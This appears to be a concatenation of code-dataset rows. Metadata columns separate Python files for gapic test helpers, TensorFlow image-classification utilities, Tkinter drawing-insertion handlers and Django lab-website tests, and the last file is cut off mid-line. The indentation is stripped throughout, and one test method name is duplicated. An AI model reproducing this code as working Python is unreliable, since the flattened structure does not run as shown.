| mit | -2,076,341,176,303,375,000 | 28.4 | 80 | 0.621022 | false | 3.898496 | false | false | false |
googleapis/gapic-generator-python | tests/unit/samplegen/common_types.py | 1 | 3695 | # Copyright (C) 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import dataclasses
import itertools
from collections import namedtuple
from typing import(Any, Dict, Iterable, Optional)
from google.protobuf import descriptor_pb2
from gapic.schema import wrappers
# Injected dummy test types
@dataclasses.dataclass(frozen=True)
class DummyMethod:
input: bool = False
output: bool = False
lro: bool = False
void: bool = False
paged_result_field: bool = False
client_streaming: bool = False
server_streaming: bool = False
flattened_fields: Dict[str, Any] = dataclasses.field(default_factory=dict)
DummyIdent = namedtuple("DummyIdent", ["name"])
DummyMessage = namedtuple(
"DummyMessage", ["fields", "type", "options", "ident"])
DummyMessage.__new__.__defaults__ = (False,) * len(DummyMessage._fields)
DummyField = namedtuple("DummyField",
["message",
"enum",
"name",
"repeated",
"field_pb",
"meta",
"is_primitive",
"type"])
DummyField.__new__.__defaults__ = (False,) * len(DummyField._fields)
DummyService = namedtuple("DummyService", ["methods", "client_name"])
DummyApiSchema = namedtuple("DummyApiSchema",
["services", "naming", "messages"])
DummyApiSchema.__new__.__defaults__ = (False,) * len(DummyApiSchema._fields)
DummyNaming = namedtuple(
"DummyNaming", ["warehouse_package_name", "name", "version", "versioned_module_name", "module_namespace"])
DummyNaming.__new__.__defaults__ = (False,) * len(DummyNaming._fields)
def message_factory(exp: str,
repeated_iter=itertools.repeat(False),
enum: Optional[wrappers.EnumType] = None,
) -> DummyMessage:
# This mimics the structure of MessageType in the wrappers module:
# A MessageType has a map from field names to Fields,
# and a Field has an (optional) MessageType.
# The 'exp' parameter is a dotted attribute expression
# used to describe the field and type hierarchy,
# e.g. "mollusc.cephalopod.coleoid"
toks = exp.split(".")
messages = [DummyMessage({}, tok.upper() + "_TYPE") for tok in toks]
if enum:
messages[-1] = enum
for base, field, attr_name, repeated_field in zip(
messages, messages[1:], toks[1:], repeated_iter
):
base.fields[attr_name] = (DummyField(message=field, repeated=repeated_field)
if isinstance(field, DummyMessage)
else DummyField(enum=field))
return messages[0]
def enum_factory(name: str, variants: Iterable[str]) -> wrappers.EnumType:
enum_pb = descriptor_pb2.EnumDescriptorProto(
name=name,
value=tuple(
descriptor_pb2.EnumValueDescriptorProto(name=v, number=i)
for i, v in enumerate(variants)
)
)
enum = wrappers.EnumType(
enum_pb=enum_pb,
values=[wrappers.EnumValueType(enum_value_pb=v) for v in enum_pb.value]
)
return enum
| apache-2.0 | -2,398,762,450,916,771,300 | 33.858491 | 110 | 0.628958 | false | 4.07387 | false | false | false |
craigcitro/pydatalab | solutionbox/image_classification/mltoolbox/image/classification/_util.py | 6 | 9918 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Reusable utility functions.
"""
import collections
import multiprocessing
import os
import tensorflow as tf
from tensorflow.python.lib.io import file_io
_DEFAULT_CHECKPOINT_GSURL = 'gs://cloud-ml-data/img/flower_photos/inception_v3_2016_08_28.ckpt'
def is_in_IPython():
try:
import IPython # noqa
return True
except ImportError:
return False
def default_project():
from google.datalab import Context
return Context.default().project_id
def _get_latest_data_dir(input_dir):
latest_file = os.path.join(input_dir, 'latest')
if not file_io.file_exists(latest_file):
raise Exception(('Cannot find "latest" file in "%s". ' +
'Please use a preprocessing output dir.') % input_dir)
with file_io.FileIO(latest_file, 'r') as f:
dir_name = f.read().rstrip()
return os.path.join(input_dir, dir_name)
def get_train_eval_files(input_dir):
"""Get preprocessed training and eval files."""
data_dir = _get_latest_data_dir(input_dir)
train_pattern = os.path.join(data_dir, 'train*.tfrecord.gz')
eval_pattern = os.path.join(data_dir, 'eval*.tfrecord.gz')
train_files = file_io.get_matching_files(train_pattern)
eval_files = file_io.get_matching_files(eval_pattern)
return train_files, eval_files
def get_labels(input_dir):
"""Get a list of labels from preprocessed output dir."""
data_dir = _get_latest_data_dir(input_dir)
labels_file = os.path.join(data_dir, 'labels')
with file_io.FileIO(labels_file, 'r') as f:
labels = f.read().rstrip().split('\n')
return labels
def read_examples(input_files, batch_size, shuffle, num_epochs=None):
"""Creates readers and queues for reading example protos."""
files = []
for e in input_files:
for path in e.split(','):
files.extend(file_io.get_matching_files(path))
thread_count = multiprocessing.cpu_count()
# The minimum number of instances in a queue from which examples are drawn
# randomly. The larger this number, the more randomness at the expense of
# higher memory requirements.
min_after_dequeue = 1000
# When batching data, the queue's capacity will be larger than the batch_size
# by some factor. The recommended formula is (num_threads + a small safety
# margin). For now, we use a single thread for reading, so this can be small.
queue_size_multiplier = thread_count + 3
# Convert num_epochs == 0 -> num_epochs is None, if necessary
num_epochs = num_epochs or None
# Build a queue of the filenames to be read.
filename_queue = tf.train.string_input_producer(files, num_epochs, shuffle)
options = tf.python_io.TFRecordOptions(
compression_type=tf.python_io.TFRecordCompressionType.GZIP)
example_id, encoded_example = tf.TFRecordReader(options=options).read_up_to(
filename_queue, batch_size)
if shuffle:
capacity = min_after_dequeue + queue_size_multiplier * batch_size
return tf.train.shuffle_batch(
[example_id, encoded_example],
batch_size,
capacity,
min_after_dequeue,
enqueue_many=True,
num_threads=thread_count)
else:
capacity = queue_size_multiplier * batch_size
return tf.train.batch(
[example_id, encoded_example],
batch_size,
capacity=capacity,
enqueue_many=True,
num_threads=thread_count)
def override_if_not_in_args(flag, argument, args):
"""Checks if flags is in args, and if not it adds the flag to args."""
if flag not in args:
args.extend([flag, argument])
def loss(loss_value):
"""Calculates aggregated mean loss."""
total_loss = tf.Variable(0.0, False)
loss_count = tf.Variable(0, False)
total_loss_update = tf.assign_add(total_loss, loss_value)
loss_count_update = tf.assign_add(loss_count, 1)
loss_op = total_loss / tf.cast(loss_count, tf.float32)
return [total_loss_update, loss_count_update], loss_op
def accuracy(logits, labels):
"""Calculates aggregated accuracy."""
is_correct = tf.nn.in_top_k(logits, labels, 1)
correct = tf.reduce_sum(tf.cast(is_correct, tf.int32))
incorrect = tf.reduce_sum(tf.cast(tf.logical_not(is_correct), tf.int32))
correct_count = tf.Variable(0, False)
incorrect_count = tf.Variable(0, False)
correct_count_update = tf.assign_add(correct_count, correct)
incorrect_count_update = tf.assign_add(incorrect_count, incorrect)
accuracy_op = tf.cast(correct_count, tf.float32) / tf.cast(
correct_count + incorrect_count, tf.float32)
return [correct_count_update, incorrect_count_update], accuracy_op
def check_dataset(dataset, mode):
"""Validate we have a good dataset."""
names = [x['name'] for x in dataset.schema]
types = [x['type'] for x in dataset.schema]
if mode == 'train':
if (set(['image_url', 'label']) != set(names) or any(t != 'STRING' for t in types)):
raise ValueError('Invalid dataset. Expect only "image_url,label" STRING columns.')
else:
if (set(['image_url']) != set(names) and set(['image_url', 'label']) != set(names)) or \
any(t != 'STRING' for t in types):
raise ValueError('Invalid dataset. Expect only "image_url" or "image_url,label" ' +
'STRING columns.')
def get_sources_from_dataset(p, dataset, mode):
"""get pcollection from dataset."""
import apache_beam as beam
import csv
from google.datalab.ml import CsvDataSet, BigQueryDataSet
check_dataset(dataset, mode)
if type(dataset) is CsvDataSet:
source_list = []
for ii, input_path in enumerate(dataset.files):
source_list.append(p | 'Read from Csv %d (%s)' % (ii, mode) >>
beam.io.ReadFromText(input_path, strip_trailing_newlines=True))
return (source_list |
'Flatten Sources (%s)' % mode >>
beam.Flatten() |
'Create Dict from Csv (%s)' % mode >>
beam.Map(lambda line: csv.DictReader([line], fieldnames=['image_url',
'label']).next()))
elif type(dataset) is BigQueryDataSet:
bq_source = (beam.io.BigQuerySource(table=dataset.table) if dataset.table is not None else
beam.io.BigQuerySource(query=dataset.query))
return p | 'Read source from BigQuery (%s)' % mode >> beam.io.Read(bq_source)
else:
raise ValueError('Invalid DataSet. Expect CsvDataSet or BigQueryDataSet')
def decode_and_resize(image_str_tensor):
"""Decodes jpeg string, resizes it and returns a uint8 tensor."""
# These constants are set by Inception v3's expectations.
height = 299
width = 299
channels = 3
image = tf.image.decode_jpeg(image_str_tensor, channels=channels)
# Note resize expects a batch_size, but tf_map supresses that index,
# thus we have to expand then squeeze. Resize returns float32 in the
# range [0, uint8_max]
image = tf.expand_dims(image, 0)
image = tf.image.resize_bilinear(image, [height, width], align_corners=False)
image = tf.squeeze(image, squeeze_dims=[0])
image = tf.cast(image, dtype=tf.uint8)
return image
def resize_image(image_str_tensor):
"""Decodes jpeg string, resizes it and re-encode it to jpeg."""
image = decode_and_resize(image_str_tensor)
image = tf.image.encode_jpeg(image, quality=100)
return image
def load_images(image_files, resize=True):
"""Load images from files and optionally resize it."""
images = []
for image_file in image_files:
with file_io.FileIO(image_file, 'r') as ff:
images.append(ff.read())
if resize is False:
return images
# To resize, run a tf session so we can reuse 'decode_and_resize()'
# which is used in prediction graph. This makes sure we don't lose
# any quality in prediction, while decreasing the size of the images
# submitted to the model over network.
image_str_tensor = tf.placeholder(tf.string, shape=[None])
image = tf.map_fn(resize_image, image_str_tensor, back_prop=False)
feed_dict = collections.defaultdict(list)
feed_dict[image_str_tensor.name] = images
with tf.Session() as sess:
images_resized = sess.run(image, feed_dict=feed_dict)
return images_resized
def process_prediction_results(results, show_image):
"""Create DataFrames out of prediction results, and display images in IPython if requested."""
import pandas as pd
if (is_in_IPython() and show_image is True):
import IPython
for image_url, image, label_and_score in results:
IPython.display.display_html('<p style="font-size:28px">%s(%.5f)</p>' % label_and_score,
raw=True)
IPython.display.display(IPython.display.Image(data=image))
result_dict = [{'image_url': url, 'label': r[0], 'score': r[1]} for url, _, r in results]
return pd.DataFrame(result_dict)
def repackage_to_staging(output_path):
"""Repackage it from local installed location and copy it to GCS."""
import google.datalab.ml as ml
# Find the package root. __file__ is under [package_root]/mltoolbox/image/classification.
package_root = os.path.join(os.path.dirname(__file__), '../../../')
# We deploy setup.py in the same dir for repackaging purpose.
setup_py = os.path.join(os.path.dirname(__file__), 'setup.py')
staging_package_url = os.path.join(output_path, 'staging', 'image_classification.tar.gz')
ml.package_and_copy(package_root, setup_py, staging_package_url)
return staging_package_url
| apache-2.0 | -7,569,009,637,302,798,000 | 36.007463 | 96 | 0.683807 | false | 3.497179 | true | false | false |
Balannen/LSMASOMM | atom3/Kernel/GraphicEditor/InsertHandlers.py | 1 | 13905 | # InsertHandlers.py
# Francois Plamondon
# Summer 2003
import Tkinter
import tkFileDialog
import tkMessageBox
import Graphics
import AbstractHandler as EventHandler
#the insert() method is implemented by the RectangleInsertHandler and OvalInsertHandler classes.
class GeneralBoxInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
raise NotImplementedError, "GeneralBoxInsertHandler is an abstract class"
def start(self):
"""start the handler"""
self.current = None
def stop(self):
"""stop the handler"""
return self.current
#canvas events
def onCanvasButton(self, event):
"""on button 1: insert a new box object (rectangle or oval)
on button 3: cancel current insertion"""
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.xy = []
self.xy.append(x)
self.xy.append(y)
self.xy.append(x+1)
self.xy.append(y+1)
self.current = self.insert()
elif event.num == 3:
if self.current != None:
self.editor.delete([self.current])
self.current = None
def onCanvasButtonMotion(self, event):
"""set xy[2], xy[3] to the new position of the mouse"""
if self.current != None:
newXY2 =event.x/self.zoom
newXY3 = event.y/self.zoom
if abs(newXY2 - self.xy[0]) >= 1 and abs(newXY3 - self.xy[1]) >= 1: #avoid zero width or height
self.xy[2] = newXY2
self.xy[3] = newXY3
self.current.setCoords(self.xy)
def onCanvasShiftButtonMotion(self, event):
"""set xy[2], xy[3] to make a square box"""
if self.current != None:
x = event.x/self.zoom
y = event.y/self.zoom
side = max(abs(x - self.xy[0]), abs(y - self.xy[1]))
if x > self.xy[0]:
self.xy[2] = self.xy[0] + side
else:
self.xy[2] = self.xy[0] - side
if y > self.xy[1]:
self.xy[3] = self.xy[1] + side
else:
self.xy[3] = self.xy[1] - side
self.current.setCoords(self.xy)
def onCanvasButtonRelease(self, event):
"""stop on button 1 release if insertion was not canceled"""
if event.num == 1 and self.current != None:
current = self.stop()
self.eventHandler.onInsertHandlerStopped(current)
# Rectangle Insertion handler
class RectangleInsertHandler(GeneralBoxInsertHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
def insert(self):
"""insert a rectangle"""
return self.editor.createRectangle(self.xy)
# Oval Insertion handler
class OvalInsertHandler(GeneralBoxInsertHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
def insert(self):
"""insert an oval"""
return self.editor.createOval(self.xy)
# Line Insertion handler
class LineInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
def start(self):
"""start the handler"""
self.current = None
def stop(self):
"""stop the handler"""
return self.current
#canvas events
def onCanvasButton(self, event):
"""on button 1: insert new line
on button 3: cancel current insertion"""
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.xy = []
self.xy.append(x)
self.xy.append(y)
self.xy.append(x)
self.xy.append(y)
self.current = self.editor.createLine(self.xy)
elif event.num == 3:
if self.current != None:
self.editor.delete([self.current])
self.current = None
def onCanvasButtonMotion(self, event):
"""set xy[2], xy[3] to the new position of the cursor"""
if self.current != None:
self.xy[2] = event.x/self.zoom
self.xy[3] = event.y/self.zoom
self.current.setCoords(self.xy)
def onCanvasShiftButtonMotion(self, event):
"""set xy[2], xy[3] to make a perfectly horizontal or vertical line, depending which one is closer"""
if self.current != None:
x = event.x/self.zoom
y = event.y/self.zoom
if abs(x - self.xy[0]) > abs(y - self.xy[1]):
self.xy[2] = x
self.xy[3] = self.xy[1]
else:
self.xy[2] = self.xy[0]
self.xy[3] = y
self.current.setCoords(self.xy)
def onCanvasButtonRelease(self, event):
"""stop on button 1 release if insertion was not canceled."""
if event.num == 1 and self.current != None:
current = self.stop()
self.eventHandler.onInsertHandlerStopped(current)
# Base class for Polyline and Polygon Insertion
class PolyInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
raise NotImplementedError, "PolyInsertHandler is an abstract class"
def start(self, smooth=0):
"""start the handler"""
self.current = None
self.smooth = smooth # smooth option
self.inserting = 0
def stop(self):
"""stop the handler. if there are less than 2 points, cancel insertion"""
if self.current != None:
if len(self.xy) < self.minimumCoords:
self.editor.delete([self.current])
self.current = None
return self.current
def create(self):
pass
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.inserting = 1
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
if self.current == None:
self.xy = []
self.xy.append(x)
self.xy.append(y)
self.xy.append(x)
self.xy.append(y)
self.current = self.create()
else:
self.xy.append(x)
self.xy.append(y)
self.current.setCoords(self.xy)
elif event.num == 3:
if self.inserting: #if button 1 also being pressed, cancel insertion
self.editor.delete([self.current])
self.current = None
self.inserting = 0
else:
self.stop()
self.eventHandler.onInsertHandlerStopped(self.current)
def onCanvasDoubleButton(self, event):
self.onCanvasButton(event)
def onCanvasButtonMotion(self, event):
if self.current != None and self.inserting:
x = event.x/self.zoom
y = event.y/self.zoom
self.xy[len(self.xy) - 2] = x
self.xy[len(self.xy) - 1] = y
self.current.setCoords(self.xy)
def onCanvasShiftButtonMotion(self, event):
if self.current != None and self.inserting:
x = event.x/self.zoom
y = event.y/self.zoom
if abs(x - self.xy[len(self.xy) - 4]) > abs(y - self.xy[len(self.xy) - 3]):
self.xy[len(self.xy) - 2] = x
self.xy[len(self.xy) - 1] = self.xy[len(self.xy) - 3]
else:
self.xy[len(self.xy) - 2] = self.xy[len(self.xy) - 4]
self.xy[len(self.xy) - 1] = y
self.current.setCoords(self.xy)
def onCanvasButtonRelease(self, event):
if event.num == 1:
self.inserting = 0
#fill color event
def onFillColor(self, color):
if self.current != None:
self.current.setFillColor(color)
#line width event
def onLineWidth(self, lineWidth):
if self.current != None:
self.current.setWidth(lineWidth)
class PolylineInsertHandler(PolyInsertHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
self.minimumCoords = 4 # minimum number of coordinates to make a polyline
def create(self):
return self.editor.createLine(self.xy, smooth=self.smooth)
class PolygonInsertHandler(PolyInsertHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
self.minimumCoords = 6 #minimum number of coordinates to make a polygon
def create(self):
return self.editor.createPolygon(self.xy, smooth=self.smooth)
def onOutlineColor(self, color):
if self.current != None:
self.current.setOutlineColor(color)
def onOutlineFillOption(self, option):
if self.current != None:
self.current.setOutlineOption(option[0])
self.current.setFillOption(option[1])
# Connector Insertion handler
class ConnectorInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.current = self.editor.createConnector([x,y])
self.eventHandler.onInsertHandlerStopped(self.current)
#Image Insertion Handler
class ImageInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
filename = tkFileDialog.askopenfilename(title="Open Image File",
filetypes=[("GIF files", "*.gif"),("All files", "*")] )
self.editor.root.focus_force()
if( filename != "" and filename[-4:].upper() == '.GIF' ):
if( 1):#try:
self.current = self.editor.createImage([x,y], filename)
else:#except:
tkMessageBox.showerror("Open Image File","Cannot open file:\nFormat not recognized")
self.eventHandler.onInsertHandlerStopped(None)
return
self.eventHandler.onInsertHandlerStopped(self.current)
return
else:
self.eventHandler.onInsertHandlerStopped(None)
return
# Text Insertion Handler
# The encapsulation of TextGF is broken here. Tkinter provides text editing
# capabilities that are used directly on the text item of the TextGF object.
class TextInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.current = self.editor.createText([x,y], "")
self.eventHandler.onInsertHandlerStopped(self.current)
# Named Connector Insertion handler
class NamedConnectorInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.current = self.editor.createNamedConnector([x,y])
self.eventHandler.onInsertHandlerStopped(self.current)
# Attribute Insertion handler
class AttributeInsertHandler(EventHandler.EventHandler):
def __init__(self, editor, eventHandler):
self.editor = editor
self.canvas = editor.getCanvas()
self.eventHandler = eventHandler
#starts the handler.
def start(self):
self.current = None
# stops the handler.
def stop(self):
return self.current
#canvas events
def onCanvasButton(self, event):
if event.num == 1:
self.zoom = self.editor.getZoom()
x = event.x/self.zoom
y = event.y/self.zoom
self.current = self.editor.createAttribute([x,y], "attribute")
self.eventHandler.onInsertHandlerStopped(self.current)
| gpl-3.0 | 4,496,965,744,688,791,000 | 31.039171 | 109 | 0.581589 | false | 3.986525 | false | false | false |
davebridges/Lab-Website | communication/tests.py | 2 | 14526 | """
This file contains the unit tests for the :mod:`communication` app.
Since this app has no models there is model and view tests:
* :class:`~communication.tests.CommunicationModelTests`
* :class:`~communication.tests.CommunicationViewTests`
"""
from lab_website.tests import BasicTests
from communication.models import LabAddress,LabLocation,Post
from personnel.models import Address, Person
from papers.models import Publication
from projects.models import Project
class CommunicationModelTests(BasicTests):
'''This class tests the views associated with models in the :mod:`communication` app.'''
fixtures = ['test_address',]
def test_create_new_lab_address(self):
'''This test creates a :class:`~communication.models.LabAddress` with the required information.'''
test_address = LabAddress(type='Primary', address=Address.objects.get(pk=1)) #repeat for all required fields
test_address.save()
self.assertEqual(test_address.pk, 1) #presumes no models loaded in fixture data
def test_lab_address_unicode(self):
'''This tests the unicode representation of a :class:`~communication.models.LabAddress`.'''
test_address = LabAddress(type='Primary', address=Address.objects.get(pk=1)) #repeat for all required fields
test_address.save()
self.assertEqual(test_address.pk, 1) #presumes no models loaded in fixture data
self.assertEqual(test_address.__unicode__(), Address.objects.get(pk=1).__unicode__())
def test_create_new_lab_location(self):
'''This test creates a :class:`~communication.models.LabLocation` with the required information only.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1) #presumes no models loaded in fixture data
def test_create_new_lab_location_all(self):
'''This test creates a :class:`~communication.models.LabLocation` with all fields included.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1,
address=Address.objects.get(pk=1),
url = 'www.cityofmemphis.org',
description = 'some description about the place',
lattitude = 35.149534,
longitude = -90.04898,) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1) #presumes no models loaded in fixture data
def test_lab_location_unicode(self):
'''This test creates a :class:`~communication.models.LabLocation` with the required information only.'''
test_location = LabLocation(name = 'Memphis',
type='City',
priority=1) #repeat for all required fields
test_location.save()
self.assertEqual(test_location.pk, 1)
self.assertEqual(test_location.__unicode__(), 'Memphis')
class CommunicationViewTests(BasicTests):
'''This class tests the views associated with the :mod:`communication` app.'''
def test_feed_details_view(self):
"""This tests the feed-details view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/feeds')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'feed_details.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('google_calendar_id' in test_response.context)
def test_lab_rules_view(self):
'''This tests the lab-rules view.
The tests ensure that the correct template is used.
It also tests whether the correct context is passed (if included).
his view uses a user with superuser permissions so does not test the permission levels for this view.'''
test_response = self.client.get('/lab-rules')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'lab_rules.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('lab_rules' in test_response.context)
self.assertTrue('lab_rules_source' in test_response.context)
def test_lab_rules_view(self):
'''This tests the data-resource-sharing view.
The tests ensure that the correct template is used.
It also tests whether the correct context is passed (if included).
his view uses a user with superuser permissions so does not test the permission levels for this view.'''
test_response = self.client.get('/data-resource-sharing')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'data_sharing_policy.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('data_sharing_policy' in test_response.context)
self.assertTrue('data_sharing_policy_source' in test_response.context)
def test_twitter_view(self):
'''This tests the twitter view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/twitter')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'twitter_timeline.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('timeline' in test_response.context)
def test_calendar_view(self):
'''This tests the google-calendar view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/calendar')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'calendar.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('google_calendar_id' in test_response.context)
#
# def test_wikipedia_view(self):
# '''This tests the google-calendar view.
#
# Currently it just ensures that the template is loading correctly.
# '''
# test_response = self.client.get('/wikipedia')
# self.assertEqual(test_response.status_code, 200)
# self.assertTemplateUsed(test_response, 'wikipedia_edits.html')
# self.assertTemplateUsed(test_response, 'base.html')
# self.assertTemplateUsed(test_response, 'jquery_script.html')
# self.assertTrue('pages' in test_response.context)
def test_news_view(self):
'''This tests the lab-news view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/news')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'lab_news.html')
self.assertTemplateUsed(test_response, 'base.html')
#self.assertTrue('statuses' in test_response.context)
self.assertTrue('links' in test_response.context)
#self.assertTrue('milestones' in test_response.context)
def test_contact_page(self):
'''This tests the contact-page view.
Currently it just ensures that the template is loading correctly.
'''
test_response = self.client.get('/contact/')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'contact.html')
self.assertTemplateUsed(test_response, 'base.html')
def test_location_page(self):
'''This tests the location view.
Currently it ensures that the template is loading, and that that the location_list context is passed.
'''
test_response = self.client.get('/location')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'location.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTrue('lablocation_list' in test_response.context)
class PostModelTests(BasicTests):
'''This class tests various aspects of the :class:`~papers.models.Post` model.'''
fixtures = ['test_publication','test_publication_personnel', 'test_project', 'test_personnel']
def test_create_new_post_minimum(self):
'''This test creates a :class:`~papers.models.Post` with the required information only.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.pk, 1)
def test_create_new_post_all(self):
'''This test creates a :class:`~papers.models.Post` with all fields entered.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md',
paper = Publication.objects.get(pk=1),
project = Project.objects.get(pk=1))
test_post.save()
self.assertEqual(test_post.pk, 1)
def test_post_unicode(self):
'''This test creates a :class:`~papers.models.Post` and then verifies the unicode representation is correct.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.__unicode__(), "Test Post")
def test_post_slugify(self):
'''This test creates a :class:`~papers.models.Post` and then verifies the unicode representation is correct.'''
test_post = Post(post_title="Test Post",
author = Person.objects.get(pk=1),
markdown_url = 'https://raw.githubusercontent.com/BridgesLab/Lab-Website/master/LICENSE.md')
test_post.save()
self.assertEqual(test_post.post_slug, "test-post")
class PostViewTests(BasicTests):
'''These test the views associated with post objects.'''
fixtures = ['test_post','test_publication','test_publication_personnel', 'test_project', 'test_personnel']
def test_post_details_view(self):
"""This tests the post-details view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_detail.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'disqus_snippet.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
self.assertTrue('post' in test_response.context)
test_response = self.client.get('/posts/not-a-fixture-post')
self.assertEqual(test_response.status_code, 404)
def test_post_list(self):
"""This tests the post-list view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_list.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
self.assertTrue('post_list' in test_response.context)
def test_post_new(self):
"""This tests the post-new view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/new')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_form.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
def test_post_edit(self):
"""This tests the post-edit view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post/edit')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'post_form.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
test_response = self.client.get('/posts/not-a-fixture-post/edit')
self.assertEqual(test_response.status_code, 404)
def test_post_delete(self):
"""This tests the post-edit view, ensuring that templates are loaded correctly.
This view uses a user with superuser permissions so does not test the permission levels for this view."""
test_response = self.client.get('/posts/fixture-post/delete')
self.assertEqual(test_response.status_code, 200)
self.assertTemplateUsed(test_response, 'confirm_delete.html')
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'analytics_tracking.html')
test_response = self.client.get('/posts/not-a-fixture-post/delete')
